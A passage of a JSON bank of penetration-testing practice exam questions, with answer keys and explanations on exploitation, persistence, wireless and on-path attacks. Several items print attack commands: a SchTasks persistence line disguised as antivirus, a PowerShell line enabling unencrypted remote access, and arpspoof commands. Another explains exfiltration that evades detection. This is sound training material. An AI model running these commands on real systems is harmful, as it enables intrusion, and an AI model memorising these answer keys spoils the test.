    "correct_answer": "D",
    "explanation": "TLS 1.3 is a secure transport protocol that supports web traffic. The other protocols listed all have flaws that render them insecure and unsuitable for use.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      111,
      212,
      225,
      112,
      89
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 95,
    "question": "Which one of the following conditions would not result in a certificate warning during a vulnerability scan of a web server?",
    "choice_a": "Use of an untrusted CA",
    "choice_b": "Inclusion of a public encryption key",
    "choice_c": "Expiration of the certificate",
    "choice_d": "Mismatch in certificate name",
    "correct_answer": "B",
    "explanation": "Digital certificates are intended to provide public encryption keys and this would not cause an error. The other circumstances are all causes for concern and would trigger an alert during a vulnerability scan.",
    "topic_id": 3,
    "practice_test_id": 7,
    "related_articles": [
      111,
      212,
      225,
      98,
      105
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 96,
    "question": "What software component is responsible for enforcing the separation of guest systems in a virtualized infrastructure?",
    "choice_a": "Guest operating system",
    "choice_b": "Host operating system",
    "choice_c": "Memory controller",
    "choice_d": "Hypervisor",
    "correct_answer": "D",
    "explanation": "In a virtualized data center, the virtual host hardware runs a special operating system known as a <i>hypervisor</i> that mediates access to the underlying hardware resources.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      115,
      255,
      86,
      256,
      109
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 97,
    "question": "In what type of attack does the attacker seek to gain access to resources assigned to a different virtual machine?",
    "choice_a": "VM escape",
    "choice_b": "Management interface brute force",
    "choice_c": "LDAP injection",
    "choice_d": "DNS amplification",
    "correct_answer": "A",
    "explanation": "VM escape vulnerabilities are the most serious issue that can exist in a virtualized environment, particularly when a virtual host runs systems of differing security levels. In an escape attack, the attacker has access to a single virtual host and then manages to leverage that access to intrude on the resources assigned to a different virtual machine.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      115,
      255,
      256,
      261,
      103
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 98,
    "question": "Which one of the following terms is not typically used to describe the connection of physical devices to a network?",
    "choice_a": "IoT",
    "choice_b": "IDS",
    "choice_c": "ICS",
    "choice_d": "SCADA",
    "correct_answer": "B",
    "explanation": "Intrusion detection systems (IDSs) are a security control used to detect network or host attacks. The Internet of Things (IoT), supervisory control and data acquisition (SCADA) systems, and industrial control systems (ICSs) are all associated with connecting physical world objects to a network.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      118,
      285,
      116,
      193,
      109
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 99,
    "question": "Monica discovers that an attacker posted a message attacking users who visit a web forum that she manages. Which one of the following attack types is most likely to have occurred?",
    "choice_a": "SQL injection",
    "choice_b": "Malware injection",
    "choice_c": "LDAP injection",
    "choice_d": "Cross-site scripting",
    "correct_answer": "D",
    "explanation": "In a cross-site scripting (XSS) attack, an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      114,
      89,
      222,
      117,
      232
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 100,
    "question": "Alan is reviewing web server logs after an attack and finds many records that contain semicolons and apostrophes in queries from end users. What type of attack should he suspect?",
    "choice_a": "SQL injection",
    "choice_b": "LDAP injection",
    "choice_c": "Cross-site scripting",
    "choice_d": "Buffer overflow",
    "correct_answer": "A",
    "explanation": "In a SQL injection attack, the attacker seeks to use a web application to gain access to an underlying database. Semicolons and apostrophes are characteristic of these attacks.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      114,
      231,
      228,
      87,
      88
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 101,
    "question": "Alice discovers a rating that her vulnerability scanner lists as 9.3 out of 10 on its severity scale. The service that is identified runs on TCP 445. What type of exploit is Alice most likely to use on this service?",
    "choice_a": "SQL injection",
    "choice_b": "SMB exploit",
    "choice_c": "CGI exploit",
    "choice_d": "MIB exploit",
    "correct_answer": "B",
    "explanation": "TCP 445 is a service port typically associated with SMB services.<br>Use the following scenario for questions 2 through 4:<br>Charles has recently completed a vulnerability scan of a system and needs to select the best vulnerability to exploit from the following listing:<br>Insert Graphic[c06uf001.jpg].",
    "topic_id": 3,
    "practice_test_id": 7,
    "related_articles": [
      126,
      99,
      100,
      93,
      119
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 102,
    "question": "Which of the entries should Charles prioritize from this list if he wants to gain access to the system?",
    "choice_a": "The Ruby on Rails vulnerability.",
    "choice_b": "The OpenSSH vulnerability.",
    "choice_c": "The MySQL vulnerability.",
    "choice_d": "None of these; he should find another target.",
    "correct_answer": "A",
    "explanation": "The Ruby on Rails vulnerability is the only vulnerability that specifically mentions remote code execution, which is most likely to allow Charles to gain access to the system.",
    "topic_id": 3,
    "practice_test_id": 6,
    "related_articles": [
      119,
      93,
      126,
      110,
      94
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 103,
    "question": "If Charles wants to build a list of additional system user accounts, which of the vulnerabilities is most likely to deliver that information?",
    "choice_a": "The Ruby on Rails vulnerability",
    "choice_b": "The OpenSSH vulnerability",
    "choice_c": "The MySQL vulnerability",
    "choice_d": "Both the OpenSSH and MySQL vulnerabilities",
    "correct_answer": "B",
    "explanation": "The OpenSSH vulnerability specifically notes that it allows user enumeration, making this the best bet for what Charles wants to accomplish.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      229,
      84,
      89,
      112,
      288
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 104,
    "question": "If Charles selects the Ruby on Rails vulnerability, which of the following methods cannot be used to search for an existing Metasploit vulnerability?",
    "choice_a": "CVE",
    "choice_b": "BID",
    "choice_c": "MSF",
    "choice_d": "EDB",
    "correct_answer": "C",
    "explanation": "Metasploit searching supports multiple common vulnerability identifier systems, including CVE, BID, and EDB, but MSF was made up for this question. It may sound familiar, as the Metasploit console command is <code>msfconsole</code>.",
    "topic_id": 3,
    "practice_test_id": 6,
    "related_articles": [
      173,
      13,
      119,
      99,
      94
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 105,
    "question": "Matt wants to pivot from a Linux host to other hosts in the network but is unable to install additional tools beyond those found on a typical Linux server. How can he leverage the system he is on to allow vulnerability scans of those remote hosts if they are firewalled against inbound connections and protected from direct access from his penetration testing workstation?",
    "choice_a": "SSH tunneling",
    "choice_b": "Netcat port forwarding",
    "choice_c": "Enable IPv6",
    "choice_d": "Modifying browser plug-ins",
    "correct_answer": "A",
    "explanation": "Matt can safely assume that almost any modern Linux system will have SSH, making SSH tunneling a legitimate option. If he connects outbound from the compromised system to his system and creates a tunnel allowing traffic in, he can use his own vulnerability scanner through the tunnel to access the remote systems.",
    "topic_id": 5,
    "practice_test_id": 3,
    "related_articles": [
      121,
      134,
      120,
      129,
      12
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 106,
    "question": "After gaining access to a Windows system, Fred uses the following command:<br>SchTasks /create /SC Weekly /TN \"Antivirus\" /TR \"C:\\Users\\SSmith\\av.exe\" /ST 09:00 <br>What has he accomplished?",
    "choice_a": "He has set up a weekly antivirus scan.",
    "choice_b": "He has set up a job called \u201cweekly.\u201d",
    "choice_c": "He has scheduled his own executable to run weekly.",
    "choice_d": "Nothing; this command will only run on Linux.",
    "correct_answer": "C",
    "explanation": "Fred has used the scheduled tasks tool to set up a weekly run of <code>av.exe</code> from a user directory at 9 a.m. It is fair to assume in this example that Fred has gained access to SSmith\u2019s user directory and has placed his own <code>av.exe</code> file there and is attempting to make it look innocuous if administrators find it.",
    "topic_id": 5,
    "practice_test_id": 1,
    "related_articles": [
      141,
      150,
      15,
      12,
      154
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 107,
    "question": "After gaining access to a Linux system through a vulnerable service, Cassandra wants to list all of the user accounts on the system and their home directories. Which of the following locations will provide this list?",
    "choice_a": "<code>/etc/shadow</code>",
    "choice_b": "<code>/etc/passwd</code>",
    "choice_c": "<code>/var/usr</code>",
    "choice_d": "<code>/home</code>",
    "correct_answer": "B",
    "explanation": "On most Linux systems, the <code>/etc/passwd</code> file will contain a list of users as well as their home directories. Capturing both <code>/etc/passwd</code> and <code>/etc/shadow</code> are important for password cracking, making both desirable targets for pentesters.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      189,
      278,
      119,
      94,
      108
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 108,
    "question": "A few days after exploiting a target with the Metasploit Meterpreter payload, Robert loses access to the remote host. A vulnerability scan shows that the vulnerability that he used to exploit the system originally is still open. What has most likely happened?",
    "choice_a": "A malware scan discovered Meterpreter and removed it.",
    "choice_b": "The system was patched.",
    "choice_c": "The system was rebooted.",
    "choice_d": "Meterpreter crashed.",
    "correct_answer": "C",
    "explanation": "Meterpreter is a memory-resident tool that injects itself into another process. The most likely answer is that the system was rebooted, thus removing the memory-resident Meterpreter process. Robert can simply repeat his exploit to regain access, but he may want to take additional steps to ensure continued access.",
    "topic_id": 5,
    "practice_test_id": 1,
    "related_articles": [
      130,
      12,
      150,
      138,
      15
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 109,
    "question": "Angela wants to exfiltrate data from a Windows system she has gained access to during a penetration test. Which of the following exfiltration techniques is least likely to be detected?",
    "choice_a": "Send it via outbound HTTP as plain text to a system she controls.",
    "choice_b": "Hash the data, then send the hash via outbound HTTPS.",
    "choice_c": "Use PowerShell to base64-encode the data, then post to a public HTTPS-accessible code repository.",
    "choice_d": "Use PowerShell to base64-encode the data, then use an SSH tunnel to transfer the data to a system she controls.",
    "correct_answer": "C",
    "explanation": "Encoding data will make it less likely that intrusion prevent and data loss prevention systems will identify acquired data, meaning that encoding is a useful technique. Sending the data to a public repository like GitHub is less likely to look unusual than an internal system opening a SSH tunnel to a previously unknown system. Sending via HTTP instead of HTTPS will make inspection of the outbound, unencoded data trivial for defenders, and hashing the data will not leave it in a recoverable state when it arrives.",
    "topic_id": 5,
    "practice_test_id": 3,
    "related_articles": [
      152,
      155,
      12,
      120,
      122
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 110,
    "question": "Ian\u2019s penetration test rules of engagement specify that he cannot add tools to the systems he compromises in a specific target environment. What techniques will he have to use to meet this requirement?",
    "choice_a": "Compromise using a fileless malware package, then cover his tracks and clean up any files he uses.",
    "choice_b": "Compromise using a known exploit and dropper from Metasploit, then use living-off-the-land techniques.",
    "choice_c": "Compromise using a fileless malware package, then use living-off-the-land techniques.",
    "choice_d": "Compromise using a known exploit and dropper from Metasploit, then clean up the dropped files and only use system utilities for further work.",
    "correct_answer": "C",
    "explanation": "A combination of fileless malware and living-off-the-land techniques that use native tools and utilities will help Ian to ensure that he meets the rules of engagement of the penetration test he is conducting. Even cleaning up files will violate those rules, meaning that Ian should not add tools even if he is confident in his ability to clean them up after he is done. A Metasploit dropper leaves files behind, which means both answers that use this do not meet the requirements.",
    "topic_id": 5,
    "practice_test_id": 3,
    "related_articles": [
      138,
      133,
      122,
      154,
      306
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 111,
    "question": "Tina has acquired a list of valid user accounts but does not have passwords for them. If she has not found any vulnerabilities but believes that the organization she is targeting has poor password practices, what type of attack can she use to try to gain access to a target system where those usernames are likely valid?",
    "choice_a": "Rainbow tables",
    "choice_b": "Dictionary attacks",
    "choice_c": "Thesaurus attacks",
    "choice_d": "Meterpreter",
    "correct_answer": "B",
    "explanation": "Tina may want to try a brute-force dictionary attack to test for weak passwords. She should build a custom dictionary for her target organization, and she may want to do some social engineering work or social media assessment up front to help her identify any common password selection behaviors that members of the organization tend to display.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      199,
      189,
      173,
      126,
      288
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 112,
    "question": "What built-in Windows server administration tool can allow command-line PowerShell access from other systems?",
    "choice_a": "VNC",
    "choice_b": "PowerSSHell",
    "choice_c": "PSRemote",
    "choice_d": "RDP",
    "correct_answer": "C",
    "explanation": "PSRemote, or PowerShell Remote, provides command-line access from remote systems. Once you have established a remote trust relationship using valid credentials, you can use PowerShell commands for a variety of exploit and information-gathering activities, including use of dedicated PowerShell exploit tools.",
    "topic_id": 5,
    "practice_test_id": 4,
    "related_articles": [
      135,
      131,
      134,
      138,
      120
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 113,
    "question": "John wants to retain access to a Linux system. Which of the following is not a common method of maintaining persistence on Linux servers?",
    "choice_a": "Scheduled tasks",
    "choice_b": "cron jobs",
    "choice_c": "Trojaned services",
    "choice_d": "Modified daemons",
    "correct_answer": "A",
    "explanation": "The Windows Task Scheduler is used for scheduled tasks. On Linux, cron jobs are set to start applications and other events on time. Other common means of creating persistent access to Linux systems include modifying system daemons, replacing services with Trojaned versions, or even simply creating user accounts for later use.",
    "topic_id": 5,
    "practice_test_id": 1,
    "related_articles": [
      141,
      150,
      151,
      153,
      120
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 114,
    "question": "Tim has selected his Metasploit exploit and set his payload as <code>cmd/unix/generic</code>. After attempting the exploit, he receives the following output. What went wrong?<br>Insert Graphic[c06uf002.jpg]",
    "choice_a": "The remote host is firewalled.",
    "choice_b": "The remote host is not online.",
    "choice_c": "The host is not routable.",
    "choice_d": "The remote host was not set.",
    "correct_answer": "D",
    "explanation": "Metasploit needs to know the remote target host, known as <code>rhost</code>, and this was not set. Tim can set it by typing <code>set rhost [<i>ip address</i>]</code> with the proper IP address. Some payloads require <code>lhost</code>, or local host, to be set as well, making it a good idea to use the <code>show options</code> command before running an exploit.",
    "topic_id": 3,
    "practice_test_id": 5,
    "related_articles": [
      173,
      107,
      126,
      119,
      103
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 115,
    "question": "Cameron runs the following command via an administrative shell on a Windows system he has compromised. What has he accomplished?<br>$command = 'cmd /c powershell.exe -c Set-WSManQuickConfig <br>-Force;Set-Item WSMan:\\localhost\\Service\\Auth\\Basic -Value $True;Set-Item WSMan:\\localhost\\Service\\AllowUnencrypted <br>-Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force'",
    "choice_a": "He has enabled PowerShell for local users.",
    "choice_b": "He has set up PSRemoting.",
    "choice_c": "He has disabled remote command-line access.",
    "choice_d": "He has set up WSMan.",
    "correct_answer": "B",
    "explanation": "Cameron has enabled PowerShell remote access, known as PSRemoting, and has configured it to allow unencrypted sessions using basic auth. This configuration should worry any Windows administrator who finds it!",
    "topic_id": 5,
    "practice_test_id": 3,
    "related_articles": [
      135,
      134,
      150,
      120,
      138
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 116,
    "question": "Mike discovers a number of information exposure vulnerabilities while preparing for the exploit phase of a penetration test. If he has not been able to identify user or service information beyond vulnerability details, what priority should he place on exploiting them?",
    "choice_a": "High priority; exploit early.",
    "choice_b": "Medium priority; exploit after other system and service exploits have been attempted.",
    "choice_c": "Low priority; only exploit if time permits.",
    "choice_d": "Do not exploit; information exposure exploits are not worth conducting.",
    "correct_answer": "A",
    "explanation": "Although it may seem odd, exploiting information-gathering exploits early can help provide useful information for other exploits. In addition, most information-gathering exploits leave very little evidence and can provide information on service configurations and user accounts, making them a very useful tool in a situation like the scenario described.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      126,
      119,
      93,
      199,
      107
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 117,
    "question": "Annie is using a collection of leaked passwords to attempt to log in to multiple user accounts belonging to staff of the company she is penetration testing. The tool she is using attempts to log into each account using a single password, then moves on to the next password, recording failures and successes. What type of attack is Annie conducting?",
    "choice_a": "A firehose attack",
    "choice_b": "Password spraying",
    "choice_c": "Pass the hash",
    "choice_d": "A cloned password attack",
    "correct_answer": "B",
    "explanation": "Annie is using a password spraying attack, which uses the same password against a variety of accounts, then tries the next password in a series, continuing through each password in its list for all the targeted accounts. Firehose and cloned password attacks were made up for this question, and pass-the-hash attacks use captured hashes to attempt to use existing sessions.",
    "topic_id": 3,
    "practice_test_id": 5,
    "related_articles": [
      143,
      94,
      189,
      278,
      82
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 118,
    "question": "Jacob wants to capture user hashes on a Windows network. Which tool could he select to gather these from broadcast messages?",
    "choice_a": "Metasploit",
    "choice_b": "Responder",
    "choice_c": "Impacket",
    "choice_d": "Wireshark",
    "correct_answer": "C",
    "explanation": "Metasploit\u2019s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts. Impacket doesn\u2019t build this capability in but provides a wide range of related tools, including the ability to authenticate with hashes once you have captured them. If you\u2019re wondering about encountering this type of question on the exam, remember to eliminate the answers you are sure of to reduce the number of remaining options. Here, you can likely guess that Metasploit has a module for this, and Wireshark is a packet capture tool, so capturing broadcast traffic may require work but would be possible. Now you\u2019re down to a 50/50 chance!",
    "topic_id": 5,
    "practice_test_id": 1,
    "related_articles": [
      137,
      139,
      145,
      140,
      123
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 119,
    "question": "Madhuri has been asked to run BloodHound as part of her penetration testing efforts. What will she be able to do with the tool?",
    "choice_a": "Visualize Active Directory environments.",
    "choice_b": "Capture encrypted network traffic.",
    "choice_c": "Visualize network traffic flows.",
    "choice_d": "Find encrypted files in network share drives.",
    "correct_answer": "A",
    "explanation": "BloodHound ingests Active Directory forest or tree data and displays, allowing pentesters to visualize the data and analyze it by looking for elements like privileged accounts. It does not capture encrypted network traffic, visualize network flows, or search for encrypted files on shared drives.",
    "topic_id": 3,
    "practice_test_id": 5,
    "related_articles": [
      173,
      75,
      119,
      98,
      107
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 120,
    "question": "Ben is performing a penetration test as part of a PCI DSS engagement. What technique is he most likely to use as part of network segmentation testing?",
    "choice_a": "Testing for 802.1q trunking on the Internet connection",
    "choice_b": "Testing for physical segmentation of networks",
    "choice_c": "Firewall rule validation between segments",
    "choice_d": "Antimalware rule validation between segments",
    "correct_answer": "C",
    "explanation": "PCI-DSS network segmentation assessments typically focus on ensuring that traffic cannot go from a lower-security segment to a higher-security segment. Thus, Ben will be validating firewall rules preventing this. Trunking at the ISP connection and physical segmentation testing are not common tests for this type of engagement, and antimalware tools are more likely to search for malware than to apply differing rules between network segments.",
    "topic_id": 3,
    "practice_test_id": 3,
    "related_articles": [
      81,
      142,
      116,
      74,
      80
    ],
    "source": "285006_Ch06"
  },
  {
    "id": 121,
    "question": "Charles wants to deploy a wireless intrusion detection system. Which of the following tools is best suited to that purpose?",
    "choice_a": "WiFite",
    "choice_b": "Kismet",
    "choice_c": "Aircrack-ng",
    "choice_d": "SnortiFi",
    "correct_answer": "B",
    "explanation": "Kismet is specifically designed to act as a wireless IDS in addition to its other wireless packet capture features. WiFite is designed for wireless network auditing. Aircrack-ng provides a variety of attack tools in addition to its capture and injection capabilities for wireless traffic. SnortiFi was made up for this question.<br>Use the following scenario for questions 2, 3, and 4:<br>Chris is conducting an on-site penetration test. The test is a gray-box test, and he is permitted on-site but has not been given access to the wired or wireless networks. He knows he needs to gain access to both to make further progress.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      182,
      183,
      186,
      188,
      11
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 122,
    "question": "Which of the following NAC systems would be the easiest for Chris to bypass?",
    "choice_a": "A software client-based system",
    "choice_b": "A DHCP proxy",
    "choice_c": "A MAC address filter",
    "choice_d": "None of the above",
    "correct_answer": "C",
    "explanation": "If the NAC system relies only on MAC filtering, Chris only needs to determine the hardware address of a trusted system. This may be accessible simply by looking at a label on a laptop or desktop, or he may be able to obtain it via social engineering or technical methods.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      160,
      159,
      180,
      194,
      198
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 123,
    "question": "If Chris wants to set up a false AP, which tool is best suited to his needs?",
    "choice_a": "Aircrack-ng",
    "choice_b": "Kismet",
    "choice_c": "Wireshark",
    "choice_d": "WiFite2",
    "correct_answer": "A",
    "explanation": "Aircrack-ng has fake-AP functionality built in, with tools that will allow Chris to identify valid access points, clone them, disassociate a target system, and then allow on-path attacks.",
    "topic_id": 4,
    "practice_test_id": 1,
    "related_articles": [
      182,
      188,
      187,
      159,
      198
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 124,
    "question": "Once Chris has gained access to the network, what technique can he use to gather additional credentials?",
    "choice_a": "ARP spoofing to allow an on-path attack",
    "choice_b": "Network sniffing using Wireshark",
    "choice_c": "SYN floods",
    "choice_d": "All of the above",
    "correct_answer": "A",
    "explanation": "Chris can use ARP spoofing to represent his workstation as a legitimate system that other devices are attempting to connect to. As long as his responses are faster, he will then receive traffic and can conduct on-path attacks. Network sniffing is useful after this to read traffic, but it isn\u2019t useful for most traffic on its own on a switched network. SYN floods are not useful for gaining credentials; thus, both options C and D are incorrect.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      159,
      165,
      183,
      187,
      160
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 125,
    "question": "What attack technique can allow the pentester visibility into traffic on VLANs other than their native VLAN?",
    "choice_a": "MAC spoofing",
    "choice_b": "Dot1q spoofing",
    "choice_c": "ARP spoofing",
    "choice_d": "Switch spoofing",
    "correct_answer": "D",
    "explanation": "Switch spoofing relies on a switch interface that is configured as either dynamic desirable, dynamic auto, or trunk mode, allowing an attacker to generate dynamic trunk protocol messages. The attacker can then access traffic from all VLANs.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      158,
      187,
      183,
      157,
      3
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 126,
    "question": "What type of Bluetooth attack attempts to send unsolicited messages via Bluetooth devices?",
    "choice_a": "Bluesnarfing",
    "choice_b": "Bluesniping",
    "choice_c": "Bluejacking",
    "choice_d": "Bluesending",
    "correct_answer": "C",
    "explanation": "Bluejacking is an attack technique that attempts to send unsolicited messages via Bluetooth. Bluesnarfing attempts to steal information, whereas bluesniping is a term for long-distance Bluetooth attacks. Bluesending is not a common term used for Bluetooth attacks as of this writing.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      184,
      281,
      271,
      11,
      186
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 127,
    "question": "Cassandra wants to attack a WPS-enabled system. What attack technique can she use against it?",
    "choice_a": "WPSnatch",
    "choice_b": "Pixie dust",
    "choice_c": "WPSmash",
    "choice_d": "e-Lint gathering",
    "correct_answer": "B",
    "explanation": "Pixie dust attacks use brute force to identify the key for vulnerable WPS-enabled routers due to poor key selection practices. The other options are made up.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      179,
      11,
      244,
      174,
      187
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 128,
    "question": "Michelle wants to capture NFC communications as part of a penetration test. What is the most critical factor in her ability to intercept the communication?",
    "choice_a": "Encryption",
    "choice_b": "Duration of communication",
    "choice_c": "Range",
    "choice_d": "Protocol version",
    "correct_answer": "C",
    "explanation": "NFC communications occur at a very short range that allows a \u201ctap\u201d to occur. That means that Michelle will need to put a capture device very close to the communications or that she needs specialized capabilities to try to capture the traffic at longer distances. Encryption can make it difficult to read the traffic, but it won\u2019t stop interception. Duration of the transmission and protocol version could potentially add complexity, but the key thing to remember is that NFC is a very short ranged protocol.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      184,
      183,
      185,
      3,
      282
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 129,
    "question": "As part of a penetration test, Mariana uses a tool that uses the same username and password from a list on many target systems and then uses the next username and password from its list. Which of the following terms best describes the attack she is using?",
    "choice_a": "Brute force",
    "choice_b": "Dictionary",
    "choice_c": "Hash cracking",
    "choice_d": "Password spraying",
    "correct_answer": "D",
    "explanation": "Mariana is conducting a password spraying attack. Password spraying attacks use the same credentials against many systems, then try the next credential pairing. Hash cracking attempts to identify the original password that resulted in a given captured hash. Dictionary attacks use a word list along with a set of rules to modify those words to attempt a brute-force attack. A brute-force attack involves repeated tries using an algorithm or process to attempt to log in. When a question like this has multiple potentially correct answers, remember to answer with the most specific answer rather than a broad answer.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      245,
      174,
      244,
      170,
      11
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 130,
    "question": "Steve has set his penetration testing workstation up for an on-path attack between his target and an FTP server. What is the best method for him to acquire FTP credentials?",
    "choice_a": "Capture traffic with Wireshark.",
    "choice_b": "Conduct a brute-force attack against the FTP server.",
    "choice_c": "Use an exploit against the FTP server.",
    "choice_d": "Use a downgrade attack against the next login.",
    "correct_answer": "A",
    "explanation": "FTP is an unencrypted protocol, which means that Steve can simply capture FTP traffic the next time a user logs into the FTP server from the target system. A brute-force attack may succeed, but it\u2019s more likely to be noticed. Although an exploit may exist, the question does not mention it, and even if it does exist it will not necessarily provide credentials. Finally, downgrade attacks are not useful against FTP servers.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      171,
      159,
      183,
      187,
      174
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 131,
    "question": "Ian wants to drop a tool on a compromised system that will allow him to set up reverse shell. Which of the following tools should he select?",
    "choice_a": "Aircrack-ng",
    "choice_b": "Nmap",
    "choice_c": "Netcat",
    "choice_d": "Censys",
    "correct_answer": "C",
    "explanation": "Netcat is the only tool from this list that can be used as a reverse shell. It can also be used for basic port scanning and a variety of other network attacks and testing purposes. Aircrack-ng is used for network penetration testing, nmap is a port scanner, and Censys is a search engine that can be used for open-source intelligence work.",
    "topic_id": 4,
    "practice_test_id": 1,
    "related_articles": [
      250,
      195,
      198,
      330,
      254
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 132,
    "question": "What drives the use of deauthentication attacks during penetration tests?",
    "choice_a": "The desire to capture handshakes",
    "choice_b": "Bluejacking attacks",
    "choice_c": "Network stress or load testing",
    "choice_d": "RFID cloning attacks",
    "correct_answer": "A",
    "explanation": "Deauthenticating a system will result in reauthentication, creating the possibility of capturing handshakes from a target. Bluejacking, network stress testing, and RFID cloning attacks do not rely on deauthentication.",
    "topic_id": 4,
    "practice_test_id": 1,
    "related_articles": [
      178,
      182,
      11,
      184,
      186
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 133,
    "question": "Which of the following tools will not allow Alice to capture NTLM v2 hashes over the wire for use in a pass-the-hash attack?",
    "choice_a": "Responder",
    "choice_b": "Mimikatz",
    "choice_c": "Ettercap",
    "choice_d": "Metasploit",
    "correct_answer": "B",
    "explanation": "Unlike the other options listed here, Mimikatz pulls hashes from the Local Security Authority Subsystem Service (LSASS) process. Since the question specifically notes \u201cover the wire,\u201d Mimikatz is the only tool that cannot be used for that.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      242,
      240,
      165,
      164,
      174
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 134,
    "question": "For what type of activity would you use the tools HULK, LOIC, HOIC, and SlowLoris?",
    "choice_a": "DDoS",
    "choice_b": "SMB hash capture",
    "choice_c": "DoS",
    "choice_d": "Brute-force SSH",
    "correct_answer": "C",
    "explanation": "All of these tools are denial-of-service tools. Although some of them have been used for DDoS attacks, they are not DDoS tools on their own.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      161,
      186,
      332,
      266,
      244
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 135,
    "question": "During a penetration test, Mike uses double tagging to send traffic to another system. What technique is he attempting?",
    "choice_a": "RFID tagging",
    "choice_b": "Tag nesting",
    "choice_c": "Meta tagging",
    "choice_d": "VLAN hopping",
    "correct_answer": "D",
    "explanation": "Mike is using nested tags inside a packet to attempt to hop VLANs. If he is successful, his packets will be delivered to the target system, but he will not see any response.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      158,
      162,
      331,
      286,
      3
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 136,
    "question": "Elle is using her workstation as part of an on-path attack as shown in the following image. What does she need to send at point X to ensure that the downgrade attack works properly?<br>Insert Graphic[c07uf002.jpg]",
    "choice_a": "SYN, ACK",
    "choice_b": "PSH, URG",
    "choice_c": "FIN, ACK",
    "choice_d": "SYN, FIN",
    "correct_answer": "C",
    "explanation": "Sending FIN and ACK while impersonating the target workstation will cause the connection to close. This will cause the target to attempt to establish a less secure connection if supported.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      187,
      159,
      11,
      200,
      161
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 137,
    "question": "Isaac wants to use <code>arpspoof</code> to execute an on-path attack between target host 10.0.1.5 and a server at 10.0.1.25, with a network gateway of 10.0.1.1. What commands does he need to run to do this? (Choose two.)",
    "choice_a": "<code>arpspoof -i eth0 -t 10.0.1.5 -r 10.0.1.25</code>",
    "choice_b": "<code>arpspoof -i eth0 -t 10.0.1.5 -r 10.0.1.1</code>",
    "choice_c": "<code>arpspoof -i eth0 -t 255.255.255.255 -r 10.0.1.25</code>",
    "choice_d": "<code>arpspoof -i eth0 -t 10.0.1.25 -r 10.0.1.5</code>",
    "correct_answer": [
      "A",
      "D"
    ],
    "explanation": "To fully execute an on-path attack, Isaac needs to spoof both the server and the target so that they each think that his PC is the system they are sending to. Spoofing the gateway (10.0.1.1) or the broadcast address (255.255.255.255) will not serve his purposes.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      159,
      187,
      160,
      11,
      165
    ],
    "source": "285006_Ch07"
  },
  {
    "id": 138,
    "question": "Jessica wants to list the domain password policy for a Windows domain as she prepares for a password attack against domain member systems. What <code>net</code> command can she use to do this?",
    "choice_a": "<code>net view /domainpolicy</code>",
    "choice_b": "<code>net accounts /domain</code>",
